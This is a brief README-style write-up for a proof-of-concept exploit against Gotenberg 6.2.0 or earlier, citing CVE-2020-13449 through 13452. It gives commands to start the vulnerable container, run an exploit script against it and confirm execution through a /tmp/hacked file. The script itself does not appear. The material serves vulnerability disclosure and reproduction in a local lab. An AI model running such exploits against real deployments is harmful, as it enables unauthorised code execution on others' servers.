Refer to CVE-2020-13449, CVE-2020-13450, CVE-2020-13451, CVE-2020-13452: https://sploit.tech/2020/12/29/Gotenberg.html
Write-up:
- Run Gotenberg version 6.2.0 or earlier:
$ docker run --rm -p 3000:3000 --name gotenberg thecodingmachine/gotenberg:6.2.0
- Execute the exploit with the proper URL:
$ ./go.sh http://localhost:3000
- Grab a coffee and wait.
- When the script prints the "Executed!" message, check that the /tmp/hacked file is there:
$ docker exec gotenberg bash -c "cat /tmp/hacked"